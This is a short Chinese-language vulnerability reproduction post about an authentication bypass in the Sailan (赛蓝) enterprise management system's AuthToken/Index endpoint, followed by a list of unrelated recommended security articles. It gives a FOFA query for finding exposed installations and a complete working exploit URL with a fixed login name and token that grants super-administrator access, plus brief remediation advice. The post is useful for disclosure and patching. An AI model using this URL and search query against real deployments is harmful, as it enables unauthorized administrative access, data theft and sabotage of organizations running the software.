赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现

0x01 产品简介

赛蓝企业管理系统是一款为企业提供全面管理解决方案的软件系统,它能够帮助企业实现精细化管理,提高效率,降低成本。系统集成了多种管理功能,包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等,旨在为企业提供一站式的管理解决方案。该系统以先进的管理思想为引导,结合企业实际业务流程,通过信息化手段提升企业管理水平。

0x02 漏洞概述

赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。

0x03 复现环境

FOFA:body="www.cailsoft.com" || body="赛蓝企业管理系统"

0x04 漏洞复现

访问url

/AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f

即可登录后台

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关推荐
Red Red28 分钟前
网安基础知识|IDS入侵检测系统|IPS入侵防御系统|堡垒机|VPN|EDR|CC防御|云安全-VDC/VPC|安全服务
网络·笔记·学习·安全·web安全
2401_857610031 小时前
SpringBoot社团管理:安全与维护
spring boot·后端·安全
亚远景aspice2 小时前
ISO 21434标准:汽车网络安全管理的利与弊
网络·web安全·汽车
弗锐土豆3 小时前
工业生产安全-安全帽第二篇-用java语言看看opencv实现的目标检测使用过程
java·opencv·安全·检测·面部
HackKong4 小时前
小白怎样入门网络安全?
网络·学习·安全·web安全·网络安全·黑客
打码人的日常分享4 小时前
商用密码应用安全性评估,密评整体方案,密评管理测评要求和指南,运维文档,软件项目安全设计相关文档合集(Word原件)
运维·安全·web安全·系统安全·规格说明书
爱吃奶酪的松鼠丶4 小时前
Web安全之XSS攻击的防范
安全·web安全·xss
东莞梦幻网络科技软件开发公司4 小时前
开发体育赛事直播平台防止数据泄露的技术安全方案
经验分享·安全
vmlogin虚拟多登浏览器4 小时前
虚拟浏览器可以应对哪些浏览器安全威胁?
服务器·网络·安全·跨境电商·防关联
澜世5 小时前
2024小迪安全基础入门第三课
网络·笔记·安全·网络安全